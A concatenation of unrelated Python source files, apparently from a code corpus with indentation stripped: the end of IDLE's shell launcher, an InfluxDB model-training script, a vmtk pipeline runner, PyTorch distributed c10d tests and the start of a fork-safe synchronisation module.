\n""" % (sys.argv,))
if cmd:
shell.interp.execsource(cmd)
elif script:
shell.interp.prepend_syspath(script)
shell.interp.execfile(script)
elif shell:
# If there is a shell window and no cmd or script in progress,
# check for problematic OS X Tk versions and print a warning
# message in the IDLE shell window; this is less intrusive
# than always opening a separate window.
tkversionwarning = macosxSupport.tkVersionWarning(root)
if tkversionwarning:
shell.interp.runcommand("print('%s')" % tkversionwarning)
while flist.inversedict: # keep IDLE running while files are open.
root.mainloop()
root.destroy()
capture_warnings(False)
if __name__ == "__main__":
sys.modules['PyShell'] = sys.modules['__main__']
main()
capture_warnings(False) # Make sure turned off; see issue 18081
|
final_model_creator.py | import json
import logging
import os
import sys
import argparse
import urllib3
from influxdb import InfluxDBClient
from multiprocessing import Process
from classes.artificial_features import ArtificialFeatures
from classes.features_analyzer import FeaturesAnalyzer
from classes.inputs_gatherer import InputsGatherer
from classes.model_trainer import ModelTrainer
import warnings
warnings.filterwarnings("ignore")
urllib3.disable_warnings()
# --------------------------------------------------------------------------- #
# Functions
# --------------------------------------------------------------------------- #
def mt_process(ig, k_region, target, cfg, logger):
fa = FeaturesAnalyzer(ig, forecast_type, cfg, logger)
fa.dataset_reader(k_region, [target])
mt = ModelTrainer(fa, ig, forecast_type, cfg, logger)
mt.train_final_models(k_region, target)
if __name__ == "__main__":
# --------------------------------------------------------------------------- #
# Configuration file
# --------------------------------------------------------------------------- #
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument("-c", help="configuration file")
arg_parser.add_argument("-t", help="type (MOR | EVE)")
arg_parser.add_argument("-l", help="log file (optional, if empty log redirected on stdout)")
args = arg_parser.parse_args()
# Load the main parameters
config_file = args.c
if os.path.isfile(config_file) is False:
print('\nATTENTION! Unable to open configuration file %s\n' % config_file)
sys.exit(1)
cfg = json.loads(open(args.c).read())
# Load the connections parameters and update the config dict with the related values
cfg_conns = json.loads(open(cfg['connectionsFile']).read())
cfg.update(cfg_conns)
# Define the forecast type
forecast_type = args.t
# --------------------------------------------------------------------------- #
# Set logging object
# --------------------------------------------------------------------------- #
if not args.l:
log_file = None
else:
log_file = args.l
logger = logging.getLogger()
logging.basicConfig(format='%(asctime)-15s::%(levelname)s::%(funcName)s::%(message)s', level=logging.INFO,
filename=log_file)
logger.info('Starting program')
logger.info('Connection to InfluxDb server on socket [%s:%s]' % (cfg['influxDB']['host'], cfg['influxDB']['port']))
try:
influx_client = InfluxDBClient(host=cfg['influxDB']['host'], port=cfg['influxDB']['port'],
password=cfg['influxDB']['password'], username=cfg['influxDB']['user'],
database=cfg['influxDB']['database'], ssl=cfg['influxDB']['ssl'])
except Exception as e:
logger.error('EXCEPTION: %s' % str(e))
sys.exit(3)
logger.info('Connection successful')
af = ArtificialFeatures(influx_client, forecast_type, cfg, logger)
ig = InputsGatherer(influx_client, forecast_type, cfg, logger, af)
procs = []
# Cycle over the regions
for k_region in cfg['regions'].keys():
for target in cfg['regions'][k_region]['finalModelCreator']['targets'].keys():
tmp_proc = Process(target=mt_process, args=[ig, k_region, target, cfg, logger])
tmp_proc.start()
procs.append(tmp_proc)
for proc in procs:
proc.join()
logger.info('Ending program')
|
pyperun.py | #!${PYTHON_SHEBANG}
## Program: PypeS
## Module: $RCSfile: pype.py,v $
## Language: Python
## Date: $Date: 2006/07/07 10:45:42 $
## Version: $Revision: 1.18 $
## Copyright (c) Luca Antiga, David Steinman. All rights reserved.
## See LICENCE file for details.
## This software is distributed WITHOUT ANY WARRANTY; without even
## the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
## PURPOSE. See the above copyright notices for more information.
import sys
from multiprocessing import Process, Manager
try:
from vmtk import pypeserver
from vmtk import pypes
except:
print "Unexpected error:", sys.exc_info()[0]
raise
if __name__=='__main__':
manager = Manager()
queue = manager.list()
pypeProcess = Process(target=pypeserver.PypeServer, args=(queue,None,None), kwargs={"returnIfEmptyQueue":True})
pypeProcess.start()
args = sys.argv[:]
if sys.argv[0].startswith('pyperun'):
args = sys.argv[1:]
queue.append(args)
try:
pypeProcess.join()
except KeyboardInterrupt:
pypeProcess.terminate()
except BaseException, e:
print e
|
test_c10d_common.py | # Owner(s): ["oncall: distributed"]
import copy
import os
import sys
import tempfile
import threading
import time
from datetime import timedelta
from itertools import product
from sys import platform
import torch
import torch.distributed as dist
if not dist.is_available():
print("distributed package not available, skipping tests", file=sys.stderr)
sys.exit(0)
import torch.distributed.distributed_c10d as c10d
import torch.distributed.algorithms.ddp_comm_hooks.powerSGD_hook as powerSGD
import torch.nn.functional as F
import torch.testing._internal.common_utils as common
from torch import nn
from torch.nn.parallel import DistributedDataParallel
from torch.testing._internal.common_distributed import (
MultiProcessTestCase,
)
from torch.testing._internal.common_utils import (
TestCase,
load_tests,
run_tests,
TEST_WITH_DEV_DBG_ASAN,
)
if TEST_WITH_DEV_DBG_ASAN:
print("Multiprocessing spawn is not compatible with dev/dbg asan", file=sys.stderr)
sys.exit(0)
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
if platform == "darwin":
LOOPBACK = "lo0"
else:
LOOPBACK = "lo"
torch.backends.cuda.matmul.allow_tf32 = False
def gpus_for_rank(world_size):
"""Multigpu tests are designed to simulate the multi nodes with multi
GPUs on each node. Nccl backend requires equal #GPUs in each process.
On a single node, all visible GPUs are evenly
divided to subsets, each process only uses a subset.
"""
visible_devices = list(range(torch.cuda.device_count()))
gpus_per_process = torch.cuda.device_count() // world_size
gpus_for_rank = []
for rank in range(world_size):
gpus_for_rank.append(
visible_devices[rank * gpus_per_process : (rank + 1) * gpus_per_process]
)
return gpus_for_rank
class AbstractTimeoutTest(object):
def _test_store_timeout(self, backend, init_method, c2p):
try:
dist.init_process_group(
backend=backend,
init_method=init_method,
world_size=1,
rank=0,
timeout=timedelta(seconds=1),
)
default_store = c10d._get_default_store()
tik = time.time()
with self.assertRaisesRegex(RuntimeError, "Timeout"):
default_store.get("nonexistent key")
tok = time.time()
dist.destroy_process_group()
c2p.append(float(tok - tik))
except RuntimeError as e:
# catch "Address already in use" error and report it to the main
# thread
c2p.append(e)
def _init_methods(self):
f = tempfile.NamedTemporaryFile(delete=False)
if sys.platform == "win32":
yield "file:///%s" % f.name.replace("\\", "/")
f.close()
else:
yield "file://%s" % f.name
f.close()
yield "tcp://127.0.0.1:%d" % common.find_free_port()
def _test_default_store_timeout(self, backend):
for init_method in self._init_methods():
c2p = []
t = threading.Thread(
target=self._test_store_timeout, args=(backend, init_method, c2p)
)
t.daemon = True
t.start()
t.join(5)
self.assertEqual(1, len(c2p))
if isinstance(c2p[0], float):
# waiting time should be 1s, use 3s to rule out false alarm
self.assertGreater(3, c2p[0])
elif isinstance(c2p[0], RuntimeError):
# let @retry_on_connect_failures handle the error
raise c2p[0]
else:
raise RuntimeError("Unexpected type {}".format(type(c2p[0])))
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 50, bias=False)
self.fc3 = nn.Linear(50, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
x = self.fc3(x)
return F.softmax(x, dim=1)
class DoubleGpuNet(nn.Module):
def __init__(self, gpus):
super(DoubleGpuNet, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False).to(gpus[0])
self.fc2 = nn.Linear(10, 50, bias=False).to(gpus[1])
self.fc3 = nn.Linear(50, 4, bias=False).to(gpus[1])
self.relu = nn.ReLU()
self.no_grad_param = nn.Parameter(
torch.tensor([2, 2]).long(), requires_grad=False
).to(gpus[0])
def forward(self, x):
dev0 = self.fc1.weight.device
dev1 = self.fc2.weight.device
x = self.relu(self.fc1(x.to(dev0)))
x = self.relu(self.fc2(x.to(dev1)))
x = self.fc3(x)
return F.softmax(x, dim=1).to(dev0)
class QuadraGpuNet(nn.Module):
def __init__(self, gpus):
super(QuadraGpuNet, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False).to(gpus[0])
self.fc2 = nn.Linear(10, 50, bias=False).to(gpus[1])
self.fc3 = nn.Linear(50, 4, bias=False).to(gpus[2])
self.fc4 = nn.Linear(4, 4, bias=False).to(gpus[3])
self.relu = nn.ReLU()
self.no_grad_param = nn.Parameter(
torch.tensor([2, 2]).long(), requires_grad=False
).to(gpus[0])
def forward(self, x):
dev0 = self.fc1.weight.device
dev1 = self.fc2.weight.device
dev2 = self.fc3.weight.device
dev3 = self.fc4.weight.device
x = self.relu(self.fc1(x.to(dev0)))
x = self.relu(self.fc2(x.to(dev1)))
x = self.relu(self.fc3(x.to(dev2)))
x = self.fc4(x.to(dev3))
return F.softmax(x, dim=1).to(dev0)
class ConvNet(nn.Module):
def __init__(self, gpus, layouts, dtypes):
super(ConvNet, self).__init__()
self.dtypes = dtypes
if isinstance(gpus, list):
self.layer_gpus = gpus
else:
gpus = [gpus] * 4
self.conv0 = torch.nn.Conv2d(8, 16, (2, 2)).to(
device=gpus[0], memory_format=layouts[0], dtype=dtypes[0]
)
self.conv1 = torch.nn.Conv2d(16, 32, (2, 2)).to(
device=gpus[1], memory_format=layouts[1], dtype=dtypes[1]
)
self.conv2 = torch.nn.Conv2d(32, 16, (2, 2)).to(
device=gpus[2], memory_format=layouts[2], dtype=dtypes[2]
)
self.conv3 = torch.nn.Conv2d(16, 8, (2, 2)).to(
device=gpus[3], memory_format=layouts[3], dtype=dtypes[3]
)
def forward(self, x):
x = x.to(self.dtypes[0])
# Could say
# x = self.conv0(x).to(device=self.conv1.weight.device, dtype=self.dtypes[1])
# etc. But I don't want to appeal to the weights' devices directly, because part of this test's purpose
# is to verify weights are where expected if the model gets replicated.
gpus = self.layer_gpus if hasattr(self, "layer_gpus") else [x.device] * 4
x = self.conv0(x).to(device=gpus[1], dtype=self.dtypes[1])
x = self.conv1(x).to(device=gpus[2], dtype=self.dtypes[2])
x = self.conv2(x).to(device=gpus[3], dtype=self.dtypes[3])
return self.conv3(x)
class Task(nn.Module):
def __init__(self):
super().__init__()
self.p = nn.Parameter(torch.ones(2, 2))
def forward(self, x):
return self.p + x
class ModuleForDdpCommHook(nn.Module):
def __init__(self):
super().__init__()
self.t0 = Task()
def forward(self, x, rank):
return self.t0(x + rank)
class SparseGradientModule(nn.Module):
def __init__(self):
super(SparseGradientModule, self).__init__()
self.embedding = nn.EmbeddingBag(10, 10, sparse=True)
def forward(self, x):
return F.softmax(self.embedding(x), dim=1)
class AbstractDistributedDataParallelTest(object):
def tearDown(self):
# DistributedDataParallel test doesn't seem to call FileStore destructor
# TODO: investigate this test and the test is known to have issues
# Use this hack to remove files for that test
try:
os.remove(self.file_name)
except OSError:
pass
@property
def world_size(self):
return 2
def _prepare_single_device_module(
self,
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view=False,
):
model = Net()
device = devices[0] if devices else torch.device("cuda:%d" % self.rank)
ddp_model = DistributedDataParallel(
copy.deepcopy(model).to(device),
device_ids=device_ids,
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
model.to(device)
input = torch.randn(global_batch_size, 2).to(device)
target = torch.randn(global_batch_size, 4).to(device)
return model, ddp_model, input, target
def _prepare_multi_device_module(
self,
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view=False,
):
self.assertTrue(
len(devices) == 2 or len(devices) == 4,
"unexpected devices for ddp tests {}".format(devices),
)
if len(devices) == 2:
model = DoubleGpuNet(devices)
elif len(devices) == 4:
model = QuadraGpuNet(devices)
ddp_model = DistributedDataParallel(
copy.deepcopy(model),
device_ids=device_ids,
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
input = torch.randn(global_batch_size, 2).cuda(devices[0])
target = torch.randn(global_batch_size, 4)
return model, ddp_model, input, target
def _test_ddp_with_process_group(
self,
process_group,
devices,
device_ids,
multi_device=False,
gradient_as_bucket_view=False,
):
"""
Note: we pass down `device_ids` all the way to DistributedDataParallel
as part of the test. Below you find tests that either use a list of
integers, a list of `torch.Device` instances, or an empty list.
The `devices` argument is used to control placement of the model and
must always be specified as list of `torch.Device` instances.
"""
local_batch_size = 1 if devices is None else len(devices)
global_batch_size = self.world_size * local_batch_size
if multi_device:
model, ddp_model, input, target = self._prepare_multi_device_module(
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view,
)
ddp_logging_data = ddp_model._get_ddp_logging_data()
self.assertTrue(ddp_logging_data.get("is_multi_device_module"))
else:
model, ddp_model, input, target = self._prepare_single_device_module(
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view,
)
ddp_logging_data = ddp_model._get_ddp_logging_data()
self.assertFalse(ddp_logging_data.get("is_multi_device_module"))
def step_model(model, input, target):
model.train()
output = model(input)
loss = F.mse_loss(output, target.to(output.device))
loss.backward()
def update_parameters(model):
for param in model.parameters():
with torch.no_grad():
param -= param.grad
param.grad = None
# check two model parameters over 2 iterations
for iteration in range(2):
# single cpu/gpu training
step_model(model, input, target)
# DDP training, DDP scatters subsets of input_cpu to nodes/GPUs
step_model(
ddp_model,
input[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
],
target[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
],
)
# Update weights and run a second iteration to shake out errors
update_parameters(model)
update_parameters(ddp_model)
self.assertEqual(
len(list(model.parameters())), len(list(ddp_model.parameters()))
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
self.assertEqual(i, j, rtol=1.3e-06, atol=5e-5)
# Shuffle the input so that DDP input is different
torch.manual_seed(1337 + iteration)
input = input[torch.randperm(global_batch_size)]
def _gpu_model_with_ddp_comm_hook(
self, process_group, hook=None, gradient_as_bucket_view=False, state=None
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Register a DDP communication hook if any.
if hook is not None:
gpu_model.register_comm_hook(state, hook)
return gpu_model
def _gpu_model_with_builtin_ddp_comm_hook(
self, process_group, hook=None, gradient_as_bucket_view=False
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Register a built-in DDP communication hook if defined
if hook is not None:
gpu_model._register_builtin_comm_hook(hook)
return gpu_model
def _run_and_verify_hook(self, model, input, expected_grad):
# Run forward
output = model(input, self.rank)
# Run backward
output.mean().backward()
[self.assertEqual(p.grad, expected_grad) for p in model.parameters()]
def _simple_hook(
self, state: object, bucket: dist.GradBucket
) -> torch.futures.Future[torch.Tensor]:
fut = torch.futures.Future()
fut.set_result(torch.ones_like(bucket.buffer()))
def fut_then(fut):
# Add ones to fut's result.
t = fut.value()
return t + torch.ones_like(t)
return fut.then(fut_then)
class DistributedDataParallelTest(
AbstractDistributedDataParallelTest, MultiProcessTestCase
):
def setUp(self):
super(DistributedDataParallelTest, self).setUp()
self._spawn_processes()
def test_invalid_powerSGD_state(self):
for start_powerSGD_iter, use_error_feedback, warm_start in product(
[0, 1], [True, False], [True, False]
):
if not use_error_feedback and not warm_start:
continue
with self.assertRaisesRegex(
ValueError,
"Expect `start_powerSGD_iter` > 1 if `use_error_feedback` or `warm_start` is enabled, "
"because PowerSGD can only be applied after the first two iterations in DDP.",
):
state = powerSGD.PowerSGDState(
process_group=None,
matrix_approximation_rank=1,
start_powerSGD_iter=start_powerSGD_iter,
use_error_feedback=use_error_feedback,
warm_start=warm_start,
)
class ComputeBucketAssignmentTest(TestCase):
def test_single_limit_single_dtype(self):
tensors = [
torch.empty([100], dtype=torch.float),
torch.empty([200], dtype=torch.float),
torch.empty([100], dtype=torch.float),
torch.empty([50], dtype=torch.float),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [400]
)
self.assertTrue(all(size_lim == 400 for size_lim in per_bucket_size_limits))
self.assertEqual([[0], [1], [2], [3]], result)
def test_single_limit_multi_dtype(self):
tensors = [
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [400]
)
self.assertTrue(all(size_lim == 400 for size_lim in per_bucket_size_limits))
self.assertEqual([[0, 2], [1, 3], [4], [5]], result)
def test_multi_limit_single_dtype(self):
tensors = [
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [40, 80]
)
self.assertEqual(per_bucket_size_limits, [40, 80, 80])
self.assertEqual([[0], [1, 2], [3]], result)
def test_multi_limit_multi_dtype(self):
tensors = [
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [200, 400]
)
self.assertEqual([[0], [1], [2, 4], [3, 5]], result)
self.assertEqual(per_bucket_size_limits, [200, 200, 400, 400])
class AbstractCommTest(object):
@property
def op_timeout_sec(self):
return 1
@property
def world_size(self):
return 2
def _verify_sequence_number_across_pg(self, pg, verify_pg):
seq_num = pg._get_sequence_number_for_group()
obj_list = [None for _ in range(dist.get_world_size(verify_pg))]
# We use a separate pg to verify the sequence numbers, otherwise these
# collectives will themselves increment the sequence number.
dist.all_gather_object(obj_list, seq_num, group=verify_pg)
self.assertEqual(len(set(obj_list)), 1)
return obj_list[0]
def _test_sequence_num_incremented(self, process_group, ranks):
# verify initial sequence numbers. Use a distinct process group for
# verification to keep counts as expected with respect to process_group.
verify_pg = dist.new_group(
ranks=ranks,
backend="gloo",
)
assert dist.get_world_size(process_group) == dist.get_world_size(verify_pg)
initial_num = (
self._verify_sequence_number_across_pg(
pg=process_group, verify_pg=verify_pg
)
if not c10d._rank_not_in_group(process_group)
else -1
)
# Verify sequence numbers are appropriately incremented
for i in range(10):
t = torch.ones(1, device=torch.cuda.current_device())
dist.all_reduce(t, group=process_group)
if not c10d._rank_not_in_group(process_group):
seq_num = self._verify_sequence_number_across_pg(
pg=process_group,
verify_pg=verify_pg,
)
self.assertEqual(initial_num + i + 1, seq_num)
if dist.get_world_size(process_group) > 2:
# Test when certain ranks don't call collectives
if dist.get_rank(process_group) not in [0, 2]:
dist.all_reduce(t, group=process_group, async_op=True)
# Now ranks 0 and 2 should be lagging by 1.
if not c10d._rank_not_in_group(process_group):
seq_num = process_group._get_sequence_number_for_group()
rank = dist.get_rank(process_group)
obj_list = [None for _ in range(dist.get_world_size(verify_pg))]
dist.all_gather_object(obj_list, (rank, seq_num), group=verify_pg)
rank_to_seq_num = {rank: num for (rank, num) in obj_list}
self.assertEqual(len(set(rank_to_seq_num.values())), 2)
self.assertEqual(rank_to_seq_num[0], rank_to_seq_num[2])
expected_same = {
rank_to_seq_num[i]
for i in rank_to_seq_num.keys()
if i not in [0, 2]
}
self.assertEqual(len(expected_same), 1)
self.assertEqual(rank_to_seq_num[0] + 1, rank_to_seq_num[1])
def _test_sequence_num_incremented_default_group(self, backend_name):
torch.cuda.set_device(self.rank)
store = dist.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend_name,
world_size=self.world_size,
rank=self.rank,
store=store,
)
self._test_sequence_num_incremented(
c10d._get_default_group(),
ranks=list(i for i in range(dist.get_world_size())),
)
def _test_sequence_num_incremented_subgroup(self, backend_name):
torch.cuda.set_device(self.rank)
store = dist.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend_name,
world_size=self.world_size,
rank=self.rank,
store=store,
)
subgroup_ranks = [0, 1, 2]
subgroup = dist.new_group(subgroup_ranks)
self._test_sequence_num_incremented(subgroup, subgroup_ranks)
def _test_sequence_num_set_default_pg(self, backend):
store = dist.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend,
world_size=self.world_size,
rank=self.rank,
store=store,
)
default_pg = c10d._get_default_group()
seq_num = default_pg._get_sequence_number_for_group()
obj_list = [None for _ in range(dist.get_world_size())]
dist.all_gather_object(obj_list, seq_num)
self.assertEqual(len(set(obj_list)), 1)
def _test_sequence_num_set_new_group(self, backend):
store = dist.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend,
world_size=self.world_size,
rank=self.rank,
store=store,
)
subgroup = dist.new_group([0, 1])
if not c10d._rank_not_in_group(subgroup):
subgroup_seq = subgroup._get_sequence_number_for_group()
obj_list = [None for _ in range(dist.get_world_size(subgroup))]
dist.all_gather_object(obj_list, subgroup_seq, group=subgroup)
self.assertEqual(len(set(obj_list)), 1)
def _test_warn_not_in_group(self, backend):
store = dist.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend,
world_size=self.world_size,
rank=self.rank,
store=store,
)
in_group_ranks = list(filter(lambda x: x % 2 == 0, range(self.world_size)))
group = dist.new_group(in_group_ranks)
x = torch.zeros(2, 2).cuda(self.rank)
xs = [torch.zeros(2, 2).cuda(self.rank) for _ in range(len(in_group_ranks))]
if self.rank not in in_group_ranks:
msg = ".*{}.*does not belong to.*"
with self.assertWarnsOnceRegex(UserWarning, msg.format("all_gather")):
dist.all_gather(xs, x, group=group)
with self.assertWarnsOnceRegex(UserWarning, msg.format("all_reduce")):
dist.all_reduce(x, group=group)
with self.assertWarnsOnceRegex(UserWarning, msg.format("barrier")):
dist.barrier(group=group)
with self.assertWarnsOnceRegex(UserWarning, msg.format("broadcast")):
dist.broadcast(x, src=0, group=group)
else:
dist.all_gather(xs, x, group=group)
dist.all_reduce(x, group=group)
dist.barrier(group=group)
dist.broadcast(x, src=0, group=group)
class CommTest(AbstractCommTest, MultiProcessTestCase):
def setUp(self):
super(CommTest, self).setUp()
self._spawn_processes()
def tearDown(self):
super(CommTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
def test_distributed_debug_mode(self):
# Default should be off
default_debug_mode = dist._get_debug_mode()
self.assertEqual(default_debug_mode, dist._DistributedDebugLevel.OFF)
mapping = {
"OFF": dist._DistributedDebugLevel.OFF,
"INFO": dist._DistributedDebugLevel.INFO,
"DETAIL": dist._DistributedDebugLevel.DETAIL,
}
invalid_debug_modes = ["foo", 0, 1, -1]
for mode in mapping.keys():
os.environ["TORCH_DISTRIBUTED_DEBUG"] = str(mode)
set_debug_mode = dist._get_debug_mode()
self.assertEqual(
set_debug_mode,
mapping[mode],
f"Expected {mode} to map to {mapping[mode]} but got {set_debug_mode}",
)
for mode in invalid_debug_modes:
os.environ["TORCH_DISTRIBUTED_DEBUG"] = str(mode)
with self.assertRaisesRegex(RuntimeError, "to be one of"):
dist._get_debug_mode()
class DummyWork(dist._Work):
def wait(self, timeout=5.0):
if torch.cuda.is_available():
torch.cuda.current_stream().synchronize()
return True
class DummyProcessGroup(dist.ProcessGroup):
def getBackendName(self):
return "Dummy"
def allgather(self, output_tensor_lists, input_tensor_list, opts=None):
for output_tensor_list, input_tensor in zip(output_tensor_lists, input_tensor_list):
for output_tensor in output_tensor_list:
output_tensor.copy_(input_tensor)
return DummyWork()
def allreduce(self, tensor_list, opts=None):
for tensor in tensor_list:
tensor.add_(2)
return DummyWork()
def barrier(self, opts=None):
store = c10d._get_default_store()
key = "TEST:DummyProcessGroup:barrier"
if self.rank() == 0:
worker_count = 0
# By default, TCPServer lives on rank 0. So rank 0 needs to make
# sure that it does not exit too early before other ranks finish
# using the store.
# Note that, _store_based_barrier does not solve this problem, as
# all ranks need to run at least one store.add(key, 0) before
# exiting, but there is no guarantee that rank 0 is still alive at
# that point.
while worker_count < self.size() - 1:
worker_count = store.add(key, 0)
else:
store.add(key, 1)
return DummyWork()
def broadcast(self, tensor_list, opts=None):
for tensor in tensor_list:
tensor.add_(1)
return DummyWork()
def reduce_scatter(self, output_tensor_list, input_tensor_lists, opts=None):
for output_tensor, input_tensor_list in zip(output_tensor_list, input_tensor_lists):
output_tensor.copy_(input_tensor_list[self.rank()])
return DummyWork()
def send(self, tensor_list, dst, tag=0):
for tensor in tensor_list:
tensor.add_(1)
return DummyWork()
def recv(self, tensor_list, src, tag=0):
for tensor in tensor_list:
tensor.add_(2)
return DummyWork()
class PythonProcessGroupExtensionTest(MultiProcessTestCase):
def setUp(self):
super(PythonProcessGroupExtensionTest, self).setUp()
self._spawn_processes()
def tearDown(self):
super(PythonProcessGroupExtensionTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
def test_get_backend_name(self):
dpg = DummyProcessGroup(0, 1)
self.assertEqual("Dummy", dpg.name())
def test_backend_class_attr(self):
dist.Backend.register_backend(
"dummy",
PythonProcessGroupExtensionTest.create_dummy
)
self.assertEqual(dist.Backend.DUMMY, "DUMMY")
self.assertEqual(
dist.Backend._plugins["DUMMY"],
PythonProcessGroupExtensionTest.create_dummy
)
@staticmethod
def create_dummy(store, rank, size, timeout):
return DummyProcessGroup(rank, size)
def test_collectives(self):
dist.Backend.register_backend("dummy", PythonProcessGroupExtensionTest.create_dummy)
os.environ['MASTER_ADDR'] = 'localhost'
os.environ['MASTER_PORT'] = '6789'
dist.init_process_group("dummy", rank=self.rank, world_size=self.world_size)
# test all_gather
input_tensor = torch.ones(2, 2) * 7
output_tensor_list = [torch.zeros(2, 2) for _ in range(self.world_size)]
dist.all_gather(output_tensor_list, input_tensor)
for tensor in output_tensor_list:
self.assertEqual(tensor, input_tensor)
# test all_reduce
input_tensor = torch.ones(2, 2) * 7
dist.all_reduce(input_tensor)
self.assertEqual(input_tensor, torch.ones(2, 2) * 7 + 2)
# test broadcast
input_tensor = torch.zeros(2, 2)
dist.broadcast(input_tensor, 0, async_op=True).wait()
self.assertEqual(torch.ones(2, 2), input_tensor)
# test reduce_scatter
output_tensor = torch.zeros(2, 2)
input_tensor_list = [torch.ones(2, 2) for _ in range(self.world_size)]
dist.reduce_scatter(output_tensor, input_tensor_list)
self.assertEqual(output_tensor, torch.zeros(2, 2) + 1)
dist.barrier()
dist.destroy_process_group()
def test_send_recv(self):
dist.Backend.register_backend("dummy", PythonProcessGroupExtensionTest.create_dummy)
os.environ['MASTER_ADDR'] = 'localhost'
os.environ['MASTER_PORT'] = '6789'
dist.init_process_group("dummy", rank=self.rank, world_size=self.world_size)
# test send
input_tensor = torch.zeros(2, 2)
dist.send(input_tensor, (self.rank + 1) % self.world_size)
self.assertEqual(input_tensor, torch.zeros(2, 2) + 1)
# test recv
input_tensor = torch.zeros(2, 2)
dist.recv(input_tensor, (self.rank + 1) % self.world_size)
self.assertEqual(input_tensor, torch.zeros(2, 2) + 2)
dist.barrier()
# intentionally not calling into `destroy_process_group` as not all
# user applications would explicitly that.
if __name__ == "__main__":
assert (
not torch.cuda._initialized
), "test_distributed must not have initialized CUDA context on main process"
run_tests()
|
mp.py | import os
import pickle
import struct
import sys
from functools import partial
from multiprocessing import Lock, Semaphore, Event as ProcessEvent
from threading import Thread, Event as TrEvent, RLock as ThreadRLock
from time import sleep, time
from typing import List, Dict, Optional
from multiprocessing import Process
import psutil
from six.moves.queue import Empty, Queue as TrQueue
from ..py3_interop import AbstractContextManager
try:
from multiprocessing import SimpleQueue
except ImportError:
from multiprocessing.queues import SimpleQueue
# Windows/MacOS compatibility
try:
from multiprocessing.context import ForkContext # noqa
except ImportError:
ForkContext = None
# PY2 compatibility
try:
from multiprocessing import get_context
except ImportError:
def get_context(*args, **kwargs):
return False
class _ForkSafeThreadSyncObject(object):
def __init__(self, functor):
self._sync = None
self._instance_pid = None
self._functor = functor
def _create(self):
# this part is not atomic, and there is not a lot we can do about it.
if self._instance_pid != os.getpid() or not self._sync:
# Notice! This is NOT atomic, this means the first time accessed, two concurrent calls might
# end up overwriting each others, object
# even tough it sounds horrible, the worst case in our usage scenario
# is the first call usage is not "atomic"
# Notice the order! we first create the object and THEN update the pid,
# this is so whatever happens we Never try to used the old (pre-forked copy) of the synchronization object
self._sync = self._functor()
self._instance_pid = os.getpid()
class ForkSafeRLock(_ForkSafeThreadSyncObject):
def __init__(self):
super(ForkSafeRLock, self).__init__(ThreadRLock)
def acquire(self, *args, **kwargs):
self._create()
return self._sync.acquire(*args, **kwargs)
def release(self, *args, **kwargs):
if self._sync is None:
return None
self._create()
return self._sync.release(*args, **kwargs)
def __enter__(self):
"""Return `self` upon entering the runtime context."""
self.acquire()
return self
def __exit__(self, exc_type, exc_value, traceback):
"""Raise any exception triggered within the runtime context."""
# Do whatever cleanup.
self.release()
class ForkSemaphore(_ForkSafeThreadSyncObject):
def __init__(self, value=1):
super(ForkSemaphore, self).__init__(functor=partial(Semaphore, value))
def acquire(self, *args, **kwargs):
self._create()
return self._sync.acquire(*args, **kwargs)
def release(self, *args, **kwargs):
if self._sync is None:
return None
self._create()
return self._sync.release(*args, **kwargs)
def get_value(self):
self._create()
return self._sync.get_value()
def __enter__(self):
"""Return `self` upon entering the runtime context."""
self.acquire()
return self
def __exit__(self, exc_type, exc_value, traceback):
"""Raise any exception triggered within the runtime context."""
# Do whatever cleanup.
self.release()
class ForkEvent(_ForkSafeThreadSyncObject):
def __init__(self):
super(ForkEvent, self).__init__(TrEvent)
def set(self):
self._create()
return self._sync.set()
def clear(self):
if self._sync is None:
return None
self._create()
return self._sync.clear()
def is_set(self):
self._create()
return self._sync.is_set()
def wait(self, *args, **kwargs):
self._create()
return self._sync.wait(*args, **kwargs)
